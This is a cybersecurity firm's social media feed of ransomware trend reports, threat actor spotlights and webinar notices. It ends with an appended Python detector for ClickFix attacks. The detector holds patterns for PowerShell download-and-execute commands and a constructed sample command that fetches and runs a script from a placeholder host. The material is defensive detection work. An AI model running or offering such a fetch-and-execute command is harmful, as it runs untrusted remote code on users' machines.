MOXFIVE is a cybersecurity company helping organizations respond to incidents and minimize the risk of future attacks.

Joined December 2018
Honored to share that MOXFIVE has been named one of @Inc's Best Workplaces of 2026. A true reflection of our incredible team. See the full list: inc.com/best-workplaces #IncBestWorkplaces
Voting for the @Zywave Cyber Risk Awards closes Friday May 22. MOXFIVE is a finalist for Cyber IR Team of the Year. If we've worked together, we'd appreciate your support. bit.ly/3OsxBov
The April MOXFIVE Monthly Insights is live! 🔗 MOXFIVE | Monthly Insights - April 2026 Ransomware volume dropped, but extortion-only groups using vishing grew. Qilin led for the 4th straight month. Two Fortinet RCEs and a PAN-OS zero-day under active exploitation.
MOXFIVE has joined the @AgenticAIFdn. We respond to thousands of real-world incidents and will bring that experience to help shape how agentic AI infrastructure is built for trust. Open standards are how we get there together. bit.ly/4drIZJO #AgenticAI #Cybersecurity
New MOXFIVE Threat Actor Spotlight: NightSpire emerged in early 2025 and has already listed 200 victims, ranking it the 5th most active ransomware operation we track. Full report: bit.ly/nightspire
MOXFIVE Quarterly Ransomware Briefing recap: Qilin leads US victim postings for Q1, The Gentlemen emerging fast, and the TeamPCP supply chain campaign is a case study in how quickly things can escalate. Catch the replay: bit.ly/4eWQdHY
Reminder to register for our MOXFIVE Quarterly Ransomware Briefing TOMORROW 4/29 at 2pm ET! Our team has a packed agenda for this quarter so you don't want to miss out. In addition to threat actor trends from Q1, our team will cover:
🔸 Iranian Cyber Operations & Escalating Threat Landscape
🔸 LiteLLM PyPI Compromise by TeamPCP
🔸 AXIOS npm Supply Chain Attack
🔸 Claude Mythos and Project Glasswing
Register Today >> bit.ly/3PZP9sC
#cybersecurity #incidentresponse #ir #threatintelligence #threatintel #cyberinsurance #claudemythos #projectglasswing #supplychainattack #axios #teampcp #litellm
The MOXFIVE Monthly Insights for March 2026 is now live! March saw the highest ransomware victim counts of 2026 so far, based on data leak site activity tracked by MOXFIVE. The month also brought active zero-day exploitation targeting network management infrastructure and a growing campaign against software development pipelines. bit.ly/41ElyaL
Key Findings:
🔸 Ransomware Activity: RaaS models continued to account for a large share of victim postings in March. Qilin led for the third consecutive month among groups targeting US organizations, with Inc and Akira close behind. DragonForce and Play were also among the most frequently deployed operations in March. The Gentlemen and NightSpire both saw increased activity and warrant monitoring.
🔸 Critical Zero-Day: Interlock ransomware operators exploited a critical vulnerability in Cisco Secure Firewall Management Center as a zero-day beginning January 26, 2026, more than five weeks before Cisco disclosed the patch on March 4.
🔸 Targeting the Software Supply Chain: Threat actors are using social engineering and poisoned package distribution to compromise developer credentials and gain access to source code repositories, CI/CD pipelines, and connected cloud environments. In March, TeamPCP demonstrated how quickly a single compromised tool can cascade into a month-long supply chain campaign spanning npm, PyPI, GitHub Actions, and Docker Hub.
Read the full report: bit.ly/41ElyaL
#ransomware #cybersecurity #ir #incidentresponse #TeamPCP #Qilin #Akira #DragonForce #Interlock #ThreatIntelligence #ThreatIntel
Q1 2026 didn't hold back. From nation-state APT activity to a sophisticated AI supply chain compromise, the threat landscape has already shifted heading into Q2. Join us for our MOXFIVE Quarterly Ransomware Briefing on Wednesday, April 29th at 2:00 PM ET as the MOXFIVE team breaks down what we're seeing so far in 2026, where the threat landscape might be headed, and considerations for your organization. bit.ly/3PZP9sC
Topics we'll cover:
🔸 Q1 Threat Intelligence Trends - What's changed so far this year and where the landscape is heading
🔸 APT & Hacktivist Activity - How nation-state and ideologically motivated actors are exploiting geopolitical tensions
🔸 TeamPCP Supply Chain Attack - How AI tooling is becoming a new and dangerous vector for supply chain risk
🔸 The Gentlemen - A deep dive into this emerging ransomware group's TTPs and real-world impact
Register here >> bit.ly/3PZP9sC
Wednesday, April 29, 2026, 2:00 – 3:00 PM ET
#Ransomware #CyberSecurity #ThreatIntelligence #IncidentResponse #MOXFIVE #APT #SupplyChainSecurity #DFIR #InfoSec
Replay now available! Lee Trotter, Michael Brunetti, Kim Detwiler, and Melissa Sachs had a great discussion covering all things BEC, FTF and Data Mining on yesterday's webinar so if you couldn't make it, it's now available whenever you need it! Watch now at >> bit.ly/4cuOzvH #cybersecurity #incidentresponse #BEC #FTF #dfir #eCrime
We're honored to be named a finalist for Cyber Incident Response Team of the Year in the Zywave Cyber Risk Awards again this year! This year we've continued our focus on innovation, launching our Agentic Forensics Platform, and are excited to share more developments throughout the year. As we've been from day one, we remain dedicated to evolving the industry and delivering effective and efficient outcomes for every client. Voting is open until May 22nd and we'd certainly appreciate your support! Check out all the categories and vote at bit.ly/3OsxBov #CyberRiskAwards2026 #CyberProm #incidentresponse #ir #cybersecurity #cyberinsurance
MOXFIVE just published a Threat Actor Alert on TeamPCP's active software supply chain campaign. LiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious payload, the latest development in a campaign that has been running since March 19, hitting Trivy, GitHub Actions, Docker Hub, npm, and Checkmarx KICS before reaching PyPI.
🔸 March 19: Trivy compromised, 10,000 CI/CD pipelines exposed
🔸 March 20: Stolen npm tokens seeded CanisterWorm across 64 packages
🔸 March 22: Malicious Trivy Docker images pushed directly to Docker Hub
🔸 March 23: Checkmarx KICS GitHub Action tags hijacked
🔸 March 24: LiteLLM 1.82.7 and 1.82.8 published to PyPI with a malicious payload
The full report covers the complete campaign timeline and includes resilience recommendations for organizations that may have been exposed.
Read the full report: bit.ly/4takNBY
Have questions or need help responding? Reach out to our team at incident@moxfive.com or 833-568-6695.
#SupplyChainSecurity #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TeamPCP #LiteLLM #Trivy #Checkmarx
Business email compromise is much more than just a phishing problem. BEC and funds transfer fraud remain among the most persistent and costly eCrime threats facing businesses today. The attacks are sophisticated. The financial and legal fallout is real. And most organizations aren't as prepared as they think. That's why we're bringing together experts for a live panel webinar built around one goal: making sure you know exactly what to do when it matters most.
Join Lee Trotter, Michael Brunetti, Kim Detwiler and Melissa Sachs on Wednesday, April 8th at 2pm ET and learn more about:
🔸 The current BEC threat landscape — what's evolved and what defenders need to know
🔸 Forensic investigation methodology and key milestones
🔸 Getting maximum value from your privacy counsel partnership
🔸 Post-investigation data mining — efficiencies and pitfalls
🔸 Real-world case studies and live Q&A
Whether you're in security, legal, compliance, or risk — this is one you don't want to miss.
Register Today >> bit.ly/4uIsgcX
Questions? Contact us at incident@moxfive.com or 833-568-6695.
#cybersecurity #incidentresponse #ir #dfir #BECs #FTF #eCrime
MOXFIVE Monthly Insights are out today! February marked a sharp escalation in the cyber threat environment. The strikes against Iran on February 28 drove an immediate surge in Iranian-aligned cyber activity, with state-sponsored intrusions confirmed on US networks and US companies experiencing destructive attacks resulting in system wipes. bit.ly/3NIhp28
Key Findings:
🔸 Iranian Cyber Threat Landscape: State-sponsored groups including MuddyWater established access on US networks before the conflict escalated, while hacktivist groups launched coordinated DDoS, defacement, and data breach campaigns targeting US, Gulf, and allied organizations. Confirmed destructive attacks against US enterprises show the threat extends well beyond the region.
🔸 Ransomware Remained High: Qilin led for the second consecutive month, with Cl0p continuing its Oracle E-Business Suite exploitation campaign. Play, Akira, and DragonForce were all active across multiple industries, while data extortion groups ShinyHunters and World Leaks continued operations centered on theft and extortion rather than encryption.
🔸 Critical Vulnerabilities: Active exploitation was confirmed across remote access platforms, email infrastructure, and virtualization environments, including flaws in BeyondTrust remote access products, SmarterMail, and VMware ESXi systems linked to ransomware campaigns.
🔸 Most Impacted Industries: Technology and Financial organizations saw the highest impact in February, followed by Healthcare, Manufacturing and Production, and Construction and Engineering.
🔸 Defending Against Disruptive and Destructive Threats: When the threat includes wiper malware and destructive attacks, prevention alone is not enough. Patched edge devices, hardened identities, verified backups, and no default credentials on OT systems are the foundation. Business resilience and operational continuity planning determine how quickly organizations recover when prevention falls short.
Read the full February report at bit.ly/3NIhp28 for detailed analysis on Iranian threat actors, active ransomware operations, exploitation trends, and resilience controls.
#ransomware #incidentresponse #ir #threatintelligence #threatintel #cybersecurity #Qilin #Akira #Play #DragonForce #Cl0p #Hacktivist #MuddyWater #Handala #OpIsrael #CottonSandstorm #zpentest #CyberAv3ngers #OilRig #APT33 #Agrius
Our latest MOXFIVE Threat Actor Spotlight is out today! Since emerging in August 2025, The Gentlemen ransomware operation has listed more than 200 victims on its data leak site, with January and February alone accounting for more than half of all posted victims. From MOXFIVE's experience, this group is methodical. They come in through compromised credentials or exploited internet-facing services, conduct targeted reconnaissance, and deploy ransomware domain-wide via Group Policy for maximum impact.
A few things that set them apart:
🔸 Custom BYOVD defense evasion using ThrottleStop.sys (CVE-2025-7771) to terminate security tooling at the kernel level.
🔸 Variants for Windows, Linux, and ESXi, with encryption observed at both the hypervisor and OS level.
🔸 Data exfiltration before encryption, paired with shadow copy deletion and event log clearing to limit recovery options.
🔸 Domain-wide payload distribution via NETLOGON and SYSVOL.
🔸 Manufacturing and production organizations have been hit hardest, though targeting spans technology, financial services, healthcare, and education across multiple regions.
Read the full report: bit.ly/4bmUwdv
If your organization has been impacted or you have questions about The Gentlemen or other threat actors, reach out to our team at incident@moxfive.com or 833-568-6695.
#Ransomware #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TheGentlemen #RaaS
We're so honored to be named a finalist for both Cyber Insurance Incident Response Provider and Cyber Security Consulting Services Provider of the Year in the Intelligent Insurer Cyber Insurance Awards! Congratulations to all the finalists! Check out the full list at bit.ly/45Xe1Xe. #CyberInsuranceAwardsUSA #cyberinsurance #incidentresponse #ir #cybersecurity
January showed steady ransomware pressure, with a modest decline from December's volume. Established groups exploited familiar vulnerabilities while social engineering techniques continued to prove effective as initial access vectors.
Key Findings:
🔸 Active Threats: Qilin led deployment activity, followed by Sinobi and Akira. These RaaS operations maintained consistent pressure across Manufacturing and Production (most impacted), Technology, and Healthcare sectors.
🔸 Critical Exploits: APT28 weaponized a Microsoft Office security feature bypass (CVE-2026-21509) in espionage campaigns. Critical vulnerabilities in Oracle WebLogic and Ivanti Endpoint Manager Mobile both saw exploitation following disclosure, with mass scanning observed after public PoC release.
🔸 ClickFix Social Engineering: MOXFIVE responded to several cases involving ClickFix, a technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate system prompts. ClickFix succeeds because it exploits user behavior, with variants like CrashFix that deliberately crash browsers before presenting fake recovery instructions. Users see what appears to be a legitimate system prompt and follow instructions that compromise their systems.
🔸 Defending Against ClickFix: User training remains critical; legitimate sites never ask users to paste commands into Run dialogs or PowerShell consoles. Combine awareness with restricted PowerShell execution, EDR command-line monitoring, and email gateway filtering for HTML attachments.
Read the full January report for detailed analysis on ClickFix campaigns, exploitation trends, and defense controls. bit.ly/4rZnvd2
Contact our team at incident@moxfive.com or 833-568-6695.
#Cybersecurity #Ransomware #SocialEngineering #ThreatIntelligence #IncidentResponse #Akira #Qilin #Sinobi
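The "EDR command-line monitoring" control above can be made concrete as a process-creation heuristic. This is an added example, not code from MOXFIVE or the January report: it assumes Sysmon-style fields (parent image, image, command line), treats a script host spawned by explorer.exe (the Run dialog or a user-opened console) as one indicator, and adds the fetch-and-execute command-line patterns a pasted ClickFix command relies on; the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Process images a ClickFix lure typically ends up launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# The Run dialog and a console opened by the user are children of explorer.exe.
USER_SHELLS = {"explorer.exe"}
# Constructed command-line indicators of "fetch remote content and run it".
PATTERNS = {
    "encoded_command": re.compile(r"-(enc|encodedcommand|e)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(downloadstring|invoke-webrequest|iwr|curl|irm|invoke-restmethod)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "mshta_remote": re.compile(r"mshta(\.exe)?\s+https?://", re.I),
}

@dataclass
class ProcessEvent:  # the Sysmon Event ID 1 fields we assume are available
    parent_image: str
    image: str
    command_line: str

def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Count indicators on one event and explain them; a lone explorer.exe parent scores 1."""
    reasons: list[str] = []
    if ev.image.lower() not in SCRIPT_HOSTS:
        return 0, reasons
    if ev.parent_image.lower() in USER_SHELLS:
        reasons.append("script host launched from explorer.exe (Run dialog or console)")
    reasons += [name for name, pat in PATTERNS.items() if pat.search(ev.command_line)]
    return len(reasons), reasons

def detect_clickfix(events: list[ProcessEvent], threshold: int = 2) -> list[tuple[str, list[str]]]:
    """Return (command_line, reasons) for events at or above the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.command_line, reasons))
    return hits

# Constructed sample events: one ClickFix-style paste, two benign launches, one non-script host.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (irm https://example.invalid/fix.ps1)"'),
    ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c dir"),
    ProcessEvent("code.exe", "powershell.exe", "powershell -NoProfile -File build.ps1"),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]
ALERTS = detect_clickfix(SAMPLE_EVENTS)  # one hit expected: the explorer.exe -> powershell paste
```

The threshold keeps a plain explorer.exe-launched cmd.exe (score 1) below alerting, so the rule fires on the combination of launch context and command-line shape rather than on either alone.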